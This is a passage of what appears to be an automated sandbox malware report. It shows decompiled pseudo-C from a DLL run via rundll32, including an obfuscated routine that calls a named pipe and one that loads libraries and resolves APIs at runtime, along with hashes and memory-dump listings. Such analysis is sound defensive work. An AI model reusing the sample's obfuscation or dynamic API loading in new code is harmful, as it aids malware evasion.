                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: HeapProcess
                                • String ID: /.$C'$-
                                • API String ID: 54951025-1702015707
                                • Opcode ID: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                                • Instruction ID: ccf3e92e630272ccc681d54ddd9bba27e73fa56e96dc9c7f035c5c5169f8aead
                                • Opcode Fuzzy Hash: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                                • Instruction Fuzzy Hash: 4A71BD72A08AD58AE720CB04E494BEEB3A8F78478CF110135DF8917B94DF78E595CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EF0D4 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E00007FFC7FFC130EF0D4(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
				void* _t4;
				void* _t9;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t23;
				void* _t29;
				void* _t32;
				void* _t33;

				_t29 = __rdx;
				_t27 = __rcx;
				_t25 = __rbx;
				_t23 = __rax;
				_a8 = __rbx;
				GetLastError();
				_t11 =  *0x13123888; // 0x6
				if (_t11 == 0xffffffff) goto 0x130ef0fe;
				_t4 = E00007FFC7FFC130EF5BC(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
				if (__rax != 0) goto 0x130ef13f;
				E00007FFC7FFC130EE26C(_t4, _t27, _t29);
				_t32 = _t23;
				if (_t23 != 0) goto 0x130ef11e;
				E00007FFC7FFC130EE114(_t23, _t27);
				goto 0x130ef15a;
				_t14 =  *0x13123888; // 0x6
				if (E00007FFC7FFC130EF614(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0x130ef117;
				E00007FFC7FFC130EEE40(_t32, _t23);
				_t9 = E00007FFC7FFC130EE114(_t23, _t32);
				if (_t32 == 0) goto 0x130ef15a;
				SetLastError(??);
				return _t9;
			}











                                0x7ffc130ef0d4
                                0x7ffc130ef0d4
                                0x7ffc130ef0d4
                                0x7ffc130ef0d4
                                0x7ffc130ef0d4
                                0x7ffc130ef0de
                                0x7ffc130ef0e4
                                0x7ffc130ef0ef
                                0x7ffc130ef0f1
                                0x7ffc130ef0fc
                                0x7ffc130ef108
                                0x7ffc130ef10d
                                0x7ffc130ef113
                                0x7ffc130ef117
                                0x7ffc130ef11c
                                0x7ffc130ef11e
                                0x7ffc130ef131
                                0x7ffc130ef133
                                0x7ffc130ef13a
                                0x7ffc130ef142
                                0x7ffc130ef146
                                0x7ffc130ef159

                                APIs
                                • GetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF0DE
                                • SetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF146
                                • SetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF15C
                                • abort.LIBCMT ref: 00007FFC130EF162
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: ErrorLast$abort
                                • String ID:
                                • API String ID: 1447195878-0
                                • Opcode ID: b80548e2226a9047e0fa927df35b1d713155097b6e56f97f5563107f00a1dcaf
                                • Instruction ID: ce5543993cea57cd4835e1aa8729aae120ec9e7bb04bd31614269084bfa2f0fb
                                • Opcode Fuzzy Hash: b80548e2226a9047e0fa927df35b1d713155097b6e56f97f5563107f00a1dcaf
                                • Instruction Fuzzy Hash: 99019224B0AF6E42FA586774A55613821D18F487B8F25093CD91E267C2ED2CF869C230
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F9F80 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 248pipeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 35%
                                			E00007FFC7FFC130F9F80(intOrPtr __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
				void* __rdi;
				void* __rbp;
				void* __r12;
				signed short _t143;
				signed int _t145;
				signed int _t199;
				signed int _t205;
				intOrPtr _t206;
				signed int _t209;
				signed int _t211;
				signed short* _t239;
				void* _t241;
				signed long long _t242;
				void* _t246;
				signed long long _t248;
				void* _t250;
				CHAR* _t253;
				void* _t256;
				void* _t258;
				void* _t259;
				signed short* _t262;
				void* _t267;
				void* _t271;
				void* _t273;
				void* _t275;
				void* _t277;

				_t267 = __r10;
				_t265 = __r9;
				_t246 = __rdx;
				_t241 = __rcx;
				 *((long long*)(_t258 + 0x18)) = __rbx;
				 *(_t258 + 0x20) = r9d;
				 *((intOrPtr*)(_t258 + 8)) = __ecx;
				_t259 = _t258 - 0x90;
				r12d =  *(_t259 + 0x100);
				r10d = __rdx + 0x354;
				_t239 =  *((intOrPtr*)(_t259 + 0xf0));
				r15d = r9d;
				 *(_t259 + 0x74) = __rdx - 0x3595;
				r13d = __rax - 0x228c;
				 *(_t259 + 0xf8) = __edx + 0xfffff21d;
				r11d = _t271 + 0x14c1;
				 *((intOrPtr*)(_t259 + 0x78)) =  *(_t259 + 0xf8) + 0x522;
				r14d = _t277 - 0x12f1;
				 *(_t259 + 0x7c) = r11d;
				 *(_t259 + 0x108) = _t277 - 0x145b;
				 *(_t259 + 0x80) = r14d;
				r9d = __rax - 0x11a9;
				r8d = __rax - 0x923;
				 *(_t259 + 0xd8) = r9d;
				 *(_t259 + 0x70) = r8d;
				_t206 = __rax - 0x11a9;
				 *((intOrPtr*)(_t259 + 0x84)) = _t206;
				 *(_t259 + 0x110) = __rax + 0x984;
				if (r14d - _t256 + 0x106 < 0) goto 0x130fa261;
				if (r15d == _t275 + 0x1663) goto 0x130fa261;
				_t239[0xac] = _t239[0x11e];
				r10d = r10d - 0x283;
				r8d = 0x343a;
				r9d = 0x329d;
				 *(_t259 + 0x88) = r10d;
				 *(_t259 + 0x50) = 0x13118090;
				 *(_t259 + 0x48) = 0x7d;
				 *(_t259 + 0x40) = 0x1a;
				 *(_t259 + 0x38) =  *((intOrPtr*)(_t239[0xe4] + 0x130)) - 0x23ef;
				 *(_t259 + 0x30) = 0x1e0;
				 *(_t259 + 0x28) = 0x3666;
				 *(_t259 + 0x20) = _t239;
				_t143 = E00007FFC7FFC130FF290(0x27ae, 0x343a, _t239, _t250, __r8, __r9, _t277, _t275, _t273, _t271, _t250);
				r9d =  *(_t259 + 0xf8);
				r8d =  *(_t259 + 0x110);
				r11d = _t253 - 0x1956;
				r12d = _t250 + 0x1309;
				r10d = _t273 + 0x23f6;
				r14d = _t273 + 0x30d5;
				_t239[0x11e] = _t143;
				 *((intOrPtr*)(_t259 + 0x68)) = _t256 + 0x19bd;
				 *((intOrPtr*)(_t259 + 0x60)) = _t250 + 0x165d;
				r15d = r15d + 0xfffffbb6;
				 *(_t259 + 0x58) = r10d;
				r9d = r9d + 0xfffffc44;
				 *(_t259 + 0x50) = r11d;
				r8d = r8d + 0xfffff9e1;
				 *(_t259 + 0x48) =  *(_t259 + 0x74) + 0x3189;
				 *(_t259 + 0x40) =  *((intOrPtr*)(_t259 + 0x78)) + 0x9db;
				 *(_t259 + 0x38) = _t206 + 0x1669;
				 *(_t259 + 0x30) = r14d;
				 *(_t259 + 0x28) = _t239;
				 *(_t259 + 0x20) = r15d;
				_t145 = E00007FFC7FFC130E90B0(0x13118090, _t239, _t241, _t246, __r8, __r11);
				r14d =  *(_t259 + 0x80);
				r8d =  *(_t259 + 0x74);
				r11d =  *(_t259 + 0x108);
				r8d = r8d + 0x27b2;
				r9d =  *(_t259 + 0x70);
				r11d =  &(r11d[0x9ed]);
				r10d = _t275 + 0x119f;
				 *(_t259 + 0xf8) = _t145;
				r9d = r9d + 0xfffff951;
				 *(_t259 + 0x48) = _t273 + 0x38e9;
				 *(_t259 + 0x40) = r8d;
				_t262 = _t239;
				 *(_t259 + 0x38) = r12d;
				 *(_t259 + 0x30) = r10d;
				 *(_t259 + 0x28) = r11d;
				 *(_t259 + 0x20) =  *((intOrPtr*)(_t259 + 0x78)) + 0xf39;
				E00007FFC7FFC130E2390(0x13118090, _t239, _t241, _t246, _t262, _t265, _t271);
				r8d =  *(_t259 + 0x70);
				r9d =  *(_t259 + 0xd8);
				r12d =  *(_t259 + 0x100);
				r15d =  *(_t259 + 0xe8);
				r11d =  *(_t259 + 0x7c);
				r10d =  *(_t259 + 0x88);
				if (r12d - _t273 + 0x27b2 >= 0) goto 0x130fa3c0;
				if (r13d - _t271 + 0x216 >= 0) goto 0x130fa31a;
				r11d = _t250 + 0x526;
				r10d = _t262 - 0x526;
				 *((intOrPtr*)(_t259 + 0x60)) = _t267 - 0x3c9;
				_t205 =  &(_t262[0x644]);
				 *(_t259 + 0x58) = r10d;
				r15d = _t241 + 0x11ae;
				 *(_t259 + 0x50) = r11d;
				_t199 =  *((intOrPtr*)(_t259 + 0xd0)) + 0x44a;
				 *(_t259 + 0x48) = _t239;
				_t209 =  *((intOrPtr*)(_t259 + 0x84)) + 0x4ca;
				 *(_t259 + 0x40) = _t199;
				r14d = r14d + 0xcdf;
				 *(_t259 + 0x38) = _t205;
				r9d = r9d + 0x4ca;
				 *(_t259 + 0x30) = _t209;
				r8d = r8d + 0xfffffde6;
				 *(_t259 + 0x28) = r14d;
				 *(_t259 + 0x20) = r15d;
				E00007FFC7FFC130F75E0(0x13118090, _t241, _t246);
				goto 0x130fa47d;
				_t242 = _t239[0x80];
				if (_t242 != ( *(_t259 + 0xd8) + 0x66c) * _t239[0xf0]) goto 0x130fa340;
				_t211 = _t209 & _t239[0xf0] & 0x00003189;
				r12d = r12d + _t211;
				_t248 = _t239[0x114] & r9d;
				if (r13d - _t248 < 0) goto 0x130fa47d;
				if (_t239[0x48] - (r15d | _t242) <= 0) goto 0x130fa39c;
				r12d = r12d - (r15d | 0x000027b2);
				 *_t239 =  *_t239 - _t242;
				_t239[0x20] = _t239[0x20] - (_t239[0x88] - 0x000023f6 &  *_t239);
				goto 0x130fa3af;
				_t239[0xc] = _t239[0xc] ^ _t205 * _t239[0xc4] + _t239[0x3c];
				r13d = r13d + 2;
				if (r13d - _t248 >= 0) goto 0x130fa366;
				goto 0x130fa47d;
				if (_t239[0x10c] - _t242 >= 0) goto 0x130fa47d;
				r12d =  *(_t259 + 0x70);
				asm("o16 nop [eax+eax]");
				 *(_t259 + 0x20) = _t239[0x98] | 0x0000228c;
				r9d = (_t239[0xa8] & 0x0000ffff) * ( *_t239 & 0x0000ffff) & 0x0000ffff;
				r9d = r9d * (r11w & 0xffffffff);
				r8d = _t239[0xc4] * r12d * 0x30d5;
				CallNamedPipeA(_t253, _t256, ??, ??, ??);
				r11d =  *(_t259 + 0x7c);
				if (_t199 + 1 - (_t239[0x20] - 0x23f6) * _t211 < 0) goto 0x130fa3f0;
				r12d =  *(_t259 + 0x100);
				return _t271 + 0xb3d;
			}





























                                0x7ffc130f9f80
                                0x7ffc130f9f80
                                0x7ffc130f9f80
                                0x7ffc130f9f80
                                0x7ffc130f9f80
                                0x7ffc130f9f85
                                0x7ffc130f9f8a
                                0x7ffc130f9f99
                                0x7ffc130f9fad
                                0x7ffc130f9fb5
                                0x7ffc130f9fbc
                                0x7ffc130f9fc4
                                0x7ffc130f9fcd
                                0x7ffc130f9fd1
                                0x7ffc130f9fd8
                                0x7ffc130f9fe4
                                0x7ffc130f9fec
                                0x7ffc130f9ff0
                                0x7ffc130fa005
                                0x7ffc130fa00a
                                0x7ffc130fa011
                                0x7ffc130fa019
                                0x7ffc130fa020
                                0x7ffc130fa027
                                0x7ffc130fa036
                                0x7ffc130fa03b
                                0x7ffc130fa047
                                0x7ffc130fa054
                                0x7ffc130fa05e
                                0x7ffc130fa06e
                                0x7ffc130fa080
                                0x7ffc130fa087
                                0x7ffc130fa095
                                0x7ffc130fa098
                                0x7ffc130fa09e
                                0x7ffc130fa0b3
                                0x7ffc130fa0be
                                0x7ffc130fa0c3
                                0x7ffc130fa0c8
                                0x7ffc130fa0d1
                                0x7ffc130fa0d9
                                0x7ffc130fa0e1
                                0x7ffc130fa0e6
                                0x7ffc130fa0eb
                                0x7ffc130fa0f9
                                0x7ffc130fa101
                                0x7ffc130fa10f
                                0x7ffc130fa11a
                                0x7ffc130fa125
                                0x7ffc130fa12c
                                0x7ffc130fa144
                                0x7ffc130fa14e
                                0x7ffc130fa152
                                0x7ffc130fa159
                                0x7ffc130fa15e
                                0x7ffc130fa165
                                0x7ffc130fa16a
                                0x7ffc130fa171
                                0x7ffc130fa17b
                                0x7ffc130fa182
                                0x7ffc130fa186
                                0x7ffc130fa18b
                                0x7ffc130fa190
                                0x7ffc130fa195
                                0x7ffc130fa19a
                                0x7ffc130fa1a2
                                0x7ffc130fa1a7
                                0x7ffc130fa1af
                                0x7ffc130fa1b6
                                0x7ffc130fa1bb
                                0x7ffc130fa1c9
                                0x7ffc130fa1db
                                0x7ffc130fa1ef
                                0x7ffc130fa1f6
                                0x7ffc130fa200
                                0x7ffc130fa205
                                0x7ffc130fa208
                                0x7ffc130fa20d
                                0x7ffc130fa212
                                0x7ffc130fa217
                                0x7ffc130fa21b
                                0x7ffc130fa220
                                0x7ffc130fa227
                                0x7ffc130fa22f
                                0x7ffc130fa23e
                                0x7ffc130fa24d
                                0x7ffc130fa259
                                0x7ffc130fa26b
                                0x7ffc130fa27c
                                0x7ffc130fa289
                                0x7ffc130fa2a5
                                0x7ffc130fa2ac
                                0x7ffc130fa2b0
                                0x7ffc130fa2b7
                                0x7ffc130fa2bc
                                0x7ffc130fa2c3
                                0x7ffc130fa2c8
                                0x7ffc130fa2ce
                                0x7ffc130fa2d3
                                0x7ffc130fa2d9
                                0x7ffc130fa2dd
                                0x7ffc130fa2e4
                                0x7ffc130fa2e8
                                0x7ffc130fa2ef
                                0x7ffc130fa2f3
                                0x7ffc130fa2fa
                                0x7ffc130fa30b
                                0x7ffc130fa310
                                0x7ffc130fa315
                                0x7ffc130fa31a
                                0x7ffc130fa32f
                                0x7ffc130fa337
                                0x7ffc130fa33d
                                0x7ffc130fa34a
                                0x7ffc130fa353
                                0x7ffc130fa369
                                0x7ffc130fa373
                                0x7ffc130fa390
                                0x7ffc130fa396
                                0x7ffc130fa39a
                                0x7ffc130fa3ab
                                0x7ffc130fa3af
                                0x7ffc130fa3b9
                                0x7ffc130fa3bb
                                0x7ffc130fa3dc
                                0x7ffc130fa3e2
                                0x7ffc130fa3ea
                                0x7ffc130fa41d
                                0x7ffc130fa422
                                0x7ffc130fa42a
                                0x7ffc130fa443
                                0x7ffc130fa44a
                                0x7ffc130fa45e
                                0x7ffc130fa46f
                                0x7ffc130fa475
                                0x7ffc130fa49f

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: CallNamedPipe
                                • String ID: f6$}
                                • API String ID: 1741058652-3232957126
                                • Opcode ID: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                                • Instruction ID: 4a912ea950d157e64f95df2e8f679c6dc8f7e96f2cdfa83a0d30918d97e2c507
                                • Opcode Fuzzy Hash: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                                • Instruction Fuzzy Hash: D9D18B736196C58BD724CF14E4447EABBA8F388758F104129EB8917B98DB7CE695CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E4820 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 221libraryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 93%
                                			E00007FFC7FFC130E4820(long long __rax, long long __rbx, void* __rcx, void* __r8, void* __r9, void* __r10) {
				void* __rsi;
				void* __rbp;
				void* __r13;
				void* __r15;
				signed int _t132;
				signed int _t134;
				signed int _t168;
				signed int _t183;
				signed int _t188;
				signed int _t190;
				signed int _t200;
				signed long long _t217;
				signed int _t219;
				signed long long _t223;
				signed long long _t226;
				void* _t235;
				void* _t237;
				void* _t239;
				void* _t241;
				void* _t242;
				void* _t244;
				void* _t247;
				void* _t248;
				long long _t249;
				void* _t251;
				void* _t253;
				signed int _t254;
				void* _t256;
				CHAR* _t258;
				signed long long _t259;

				_t247 = __r10;
				_t246 = __r9;
				_t244 = __r8;
				_t221 = __rcx;
				_t218 = __rbx;
				 *((long long*)(_t241 + 0x10)) = __rbx;
				 *(_t241 + 0x20) = r9d;
				_push(_t239);
				_push(_t237);
				_push(_t235);
				_push(_t251);
				_push(_t253);
				_push(_t256);
				_t242 = _t241 - 0x80;
				r10d = __r9 - 0x3666;
				r12d =  *(_t242 + 0xf8);
				r14d = __r9 - 0x22c;
				 *(_t242 + 0xc0) = r10d;
				r8d =  *(_t242 + 0xe8);
				_t9 = _t221 - 0x27b2; // 0x0
				r8d = r8d + 0xffffee57;
				 *(_t242 + 0xd0) = _t9;
				 *(_t242 + 0x68) = r8d;
				r9d = __rax + 0x1563;
				r12d = r12d + 0x984;
				r13d = __rax - 0x2103;
				 *(_t242 + 0xe8) = r9d;
				_t132 = __r10 + 0x23f6;
				 *(_t242 + 0x60) = _t132;
				if (r9d - _t132 <= 0) goto 0x130e4ab2;
				r8d = _t256 - 0x2b1;
				r10d = r10d + 0x37e1;
				r11d = _t253 + 0x38e9;
				_t254 =  *((intOrPtr*)(_t242 + 0x118));
				_t21 = _t239 + 0x2598; // 0x2598
				 *(_t242 + 0x48) = _t21;
				 *(_t242 + 0x40) = _t235 - 0x44a;
				r15d = _t256 - 0x11ae;
				 *(_t242 + 0x38) = r8d;
				_t27 = _t239 + 0x228c; // 0x228c
				r9d = _t27;
				 *(_t242 + 0x30) = r10d;
				 *(_t242 + 0x28) = r15d;
				 *(_t242 + 0x20) = r11d;
				_t134 = E00007FFC7FFC130FAA10(__rax, __rcx, _t254, __r8, __r9, _t258);
				r8d =  *(_t242 + 0xe8);
				r10d = _t251 - 0x278;
				r12d =  *(_t242 + 0xd0);
				_t168 = __rbx - 0x150e;
				 *(_t242 + 0x50) = _t168;
				r14d = _t134;
				 *(_t242 + 0x48) = _t168;
				 *(_t242 + 0x40) = _t134 + 0xfffffa6f;
				r9d = _t251 + 0x27ae;
				r11d = _t237 + 0x189;
				 *(_t242 + 0x38) =  *(_t242 + 0x60);
				_t200 = _t237 + 0x495;
				 *(_t242 + 0x30) = r10d;
				 *(_t242 + 0x28) = r11d;
				r8d = r8d + 0x283;
				 *(_t242 + 0x20) = _t254;
				 *(_t242 + 0xf8) = __rbx + 0xf39 - 0x145b;
				E00007FFC7FFC130E7120( *(_t242 + 0x100), __rax, __rcx, _t254, __r8, __r9, _t247, _t248);
				LoadLibraryA(_t258);
				r10d = __rbx + 0x2ad;
				r11d = _t251 + 0x37e1;
				 *(_t242 + 0x50) = _t200;
				 *((long long*)(_t254 + 0x268)) = __rax;
				_t58 = _t237 + 0x1270; // 0x1270
				_t188 = _t58;
				_t60 = _t256 + 0x81; // 0x81
				r8d = _t60;
				 *((intOrPtr*)(_t254 + 0x120)) =  *((intOrPtr*)(_t254 + 0x120)) + ( *(_t254 + 0x1e0) | 0x0000343a);
				r9d = r15d;
				 *(_t242 + 0x48) = _t251 + 0x329d;
				 *(_t242 + 0x40) = r10d;
				 *(_t242 + 0x38) = r11d;
				 *(_t242 + 0x30) = _t235 + 0x1011;
				 *(_t242 + 0x28) = _t188;
				 *(_t242 + 0x20) = _t254;
				E00007FFC7FFC130E2730( *(_t254 + 0x1e0) | 0x0000343a, __rbx, _t254 + 0x160, _t237, _t244);
				r8d =  *(_t242 + 0xd8);
				_t71 = _t256 - 0x1270; // -4720
				r10d =  *(_t242 + 0xc0);
				 *(_t242 + 0x48) = r8d;
				_t75 = _t256 - 0xeb4; // -3764
				r11d = _t75;
				 *(_t242 + 0x40) = _t71;
				_t77 = _t237 + 0xcdf; // 0xcdf
				r9d = _t77;
				 *(_t242 + 0x38) = _t251 + 0x2103;
				r10d = r10d + 0x3a59;
				 *(_t242 + 0x30) = r10d;
				 *(_t242 + 0x28) = r11d;
				 *(_t242 + 0x20) = _t244 + 0x3f3;
				E00007FFC7FFC130E1000( *(_t254 + 0x1e0) | 0x0000343a, _t218, _t254 + 0x160, _t237, _t254, _t246);
				goto 0x130e4c65;
				_t219 =  *((intOrPtr*)(_t242 + 0x118));
				_t259 = r12d;
				if ( *((intOrPtr*)(_t219 + 0x80)) -  *(_t219 + 0x48) * _t259 > 0) goto 0x130e4ae9;
				if (r12d - (r8d & r12d) > 0) goto 0x130e4ae9;
				_t223 = r10d;
				 *(_t242 + 0x60) = _t223;
				if (_t259 - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^ _t223) > 0) goto 0x130e4c5f;
				_t183 = r9d ^ r12d;
				 *(_t242 + 0xd8) = _t183;
				_t249 = r9d * 0x36e7;
				 *((long long*)(_t242 + 0x70)) = _t249;
				 *(_t242 + 0x100) = r14d | 0x00001f2c;
				asm("o16 nop [eax+eax]");
				r8d = r8d *  *(_t219 + 0x40);
				_t217 =  *(_t219 + 0xc8) + _t249;
				r11d =  *(_t219 + 0x1c0);
				r11d = r11d + 0x1f2c;
				_t226 = r13d & _t259 ^ _t217;
				_t190 = _t188 * ( *(_t219 + 0x120) * r12d +  *((intOrPtr*)(_t219 + 0x60))) | r14d -  *((intOrPtr*)(_t219 + 0x110));
				 *(_t219 + 0xc8) = _t226;
				 *(_t242 + 0xf8) = _t190;
				r13d = r13d |  *(_t219 + 0x188) | _t183;
				r10d = _t217 + _t226;
				r9d =  *(_t242 + 0x100);
				 *(_t242 + 0x48) = ( *(_t219 + 0x1b8) | 0x0000343a) & r9d;
				r9d = r9d & _t200;
				 *(_t242 + 0x40) = _t219;
				 *(_t242 + 0x38) = r10d;
				 *(_t242 + 0x30) = r11d;
				 *(_t242 + 0x28) = _t190 &  *(_t219 + 0x150) & 0x00002032;
				 *(_t242 + 0x20) = r10d -  *((intOrPtr*)(_t219 + 0x218));
				E00007FFC7FFC130F98F0(_t254 + 0x00003a59 & r14d, _t217, _t254, _t254, _t246, _t254);
				r12d = r12d + 4;
				 *(_t219 + 0x150) =  *(_t219 + 0x150) + _t226 - ( *(_t219 + 0xd8) ^  *(_t219 + 0x30));
				r9d =  *(_t242 + 0xe8);
				r10d =  *(_t242 + 0xc0);
				r8d =  *(_t242 + 0x68);
				if (r12d - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^  *(_t242 + 0x60)) <= 0) goto 0x130e4b40;
				goto 0x130e4c65;
				_t129 = _t239 + 0x3595; // 0x3595
				return _t129;
			}

































                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4825
                                0x7ffc130e482a
                                0x7ffc130e482b
                                0x7ffc130e482c
                                0x7ffc130e482d
                                0x7ffc130e482f
                                0x7ffc130e4831
                                0x7ffc130e4835
                                0x7ffc130e4843
                                0x7ffc130e484a
                                0x7ffc130e4852
                                0x7ffc130e485c
                                0x7ffc130e4864
                                0x7ffc130e486c
                                0x7ffc130e4872
                                0x7ffc130e4879
                                0x7ffc130e4883
                                0x7ffc130e4888
                                0x7ffc130e488f
                                0x7ffc130e4896
                                0x7ffc130e489d
                                0x7ffc130e48a5
                                0x7ffc130e48ac
                                0x7ffc130e48b9
                                0x7ffc130e48bf
                                0x7ffc130e48c6
                                0x7ffc130e48cd
                                0x7ffc130e48d4
                                0x7ffc130e48dc
                                0x7ffc130e48e2
                                0x7ffc130e48ec
                                0x7ffc130e48f0
                                0x7ffc130e48f7
                                0x7ffc130e48fc
                                0x7ffc130e48fc
                                0x7ffc130e4903
                                0x7ffc130e490e
                                0x7ffc130e4919
                                0x7ffc130e491e
                                0x7ffc130e4923
                                0x7ffc130e492b
                                0x7ffc130e4933
                                0x7ffc130e4948
                                0x7ffc130e494e
                                0x7ffc130e4952
                                0x7ffc130e4955
                                0x7ffc130e495e
                                0x7ffc130e4962
                                0x7ffc130e496e
                                0x7ffc130e4975
                                0x7ffc130e4979
                                0x7ffc130e497f
                                0x7ffc130e498a
                                0x7ffc130e498f
                                0x7ffc130e4998
                                0x7ffc130e499f
                                0x7ffc130e49a6
                                0x7ffc130e49b4
                                0x7ffc130e49c1
                                0x7ffc130e49cf
                                0x7ffc130e49d7
                                0x7ffc130e49e1
                                0x7ffc130e49e8
                                0x7ffc130e49e8
                                0x7ffc130e49f5
                                0x7ffc130e49f5
                                0x7ffc130e4a08
                                0x7ffc130e4a1d
                                0x7ffc130e4a20
                                0x7ffc130e4a24
                                0x7ffc130e4a29
                                0x7ffc130e4a2e
                                0x7ffc130e4a32
                                0x7ffc130e4a36
                                0x7ffc130e4a3b
                                0x7ffc130e4a40
                                0x7ffc130e4a48
                                0x7ffc130e4a4f
                                0x7ffc130e4a5f
                                0x7ffc130e4a64
                                0x7ffc130e4a64
                                0x7ffc130e4a6b
                                0x7ffc130e4a6f
                                0x7ffc130e4a6f
                                0x7ffc130e4a7d
                                0x7ffc130e4a81
                                0x7ffc130e4a8f
                                0x7ffc130e4a97
                                0x7ffc130e4a9c
                                0x7ffc130e4aa0
                                0x7ffc130e4aad
                                0x7ffc130e4ab2
                                0x7ffc130e4aba
                                0x7ffc130e4acc
                                0x7ffc130e4ad7
                                0x7ffc130e4af4
                                0x7ffc130e4afa
                                0x7ffc130e4b02
                                0x7ffc130e4b12
                                0x7ffc130e4b15
                                0x7ffc130e4b1c
                                0x7ffc130e4b27
                                0x7ffc130e4b2c
                                0x7ffc130e4b37
                                0x7ffc130e4b4a
                                0x7ffc130e4b4f
                                0x7ffc130e4b52
                                0x7ffc130e4b5c
                                0x7ffc130e4b66
                                0x7ffc130e4b72
                                0x7ffc130e4b74
                                0x7ffc130e4b85
                                0x7ffc130e4b92
                                0x7ffc130e4bad
                                0x7ffc130e4bc9
                                0x7ffc130e4bd1
                                0x7ffc130e4bd5
                                0x7ffc130e4bd8
                                0x7ffc130e4bdd
                                0x7ffc130e4be2
                                0x7ffc130e4be7
                                0x7ffc130e4beb
                                0x7ffc130e4bef
                                0x7ffc130e4bfb
                                0x7ffc130e4c12
                                0x7ffc130e4c2b
                                0x7ffc130e4c33
                                0x7ffc130e4c3b
                                0x7ffc130e4c52
                                0x7ffc130e4c5d
                                0x7ffc130e4c5f
                                0x7ffc130e4c7f

                                APIs
                                • LoadLibraryA.KERNEL32 ref: 00007FFC130E49B4
                                  • Part of subcall function 00007FFC130E2730: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00001270,00007FFC130E4A40), ref: 00007FFC130E285E
                                  • Part of subcall function 00007FFC130E1000: GetProcAddress.KERNEL32 ref: 00007FFC130E10D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
